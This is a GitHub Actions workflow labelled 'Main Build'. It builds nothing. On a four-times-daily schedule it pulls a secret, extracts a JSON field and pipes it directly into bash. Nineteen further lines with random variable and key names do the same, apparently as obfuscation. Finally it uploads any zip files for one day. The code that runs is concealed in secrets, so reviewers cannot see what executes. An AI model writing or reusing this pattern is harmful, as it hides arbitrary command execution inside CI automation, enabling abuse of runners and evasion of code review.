name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          gy141: ${{ secrets.gy141 }}
        run: |
          printf '%s' "$gy141" | jq -r .i5 | /bin/bash
          printf '%s' "$neg0701" | jq -r .qsn02 | /bin/bash
          printf '%s' "$akfx16" | jq -r .o729 | /bin/bash
          echo $v27 | jq -r .wxe72 | /bin/bash
          echo $om29254 | jq -r .j91 | /bin/bash
          printf '%s' "$ovpre1668" | jq -r .buqp648 | /bin/bash
          printf '%s' "$ig626" | jq -r .swfz66646 | /bin/bash
          echo $aebaz73104 | jq -r .x54874 | /bin/bash
          printf '%s' "$a2259" | jq -r .brph97 | /bin/bash
          printf '%s' "$e71" | jq -r .nwnnj8 | /bin/bash
          echo $dkvn8104 | jq -r .hlas50490 | /bin/bash
          echo $yjkxs58043 | jq -r .mvo62 | /bin/bash
          printf '%s' "$k4460" | jq -r .bzn21202 | /bin/bash
          echo $meksf5651 | jq -r .noc4215 | /bin/bash
          echo $lf756 | jq -r .pnfgi5332 | /bin/bash
          printf '%s' "$u494" | jq -r .rc2880 | /bin/bash
          echo $hw0032 | jq -r .rgy33446 | /bin/bash
          echo $smu07 | jq -r .kt6877 | /bin/bash
          echo $tbpzb32932 | jq -r .wbgxy4748 | /bin/bash
          printf '%s' "$scobw38021" | jq -r .i616 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: YOrojazl
          path: "*.zip"
          retention-days: 1
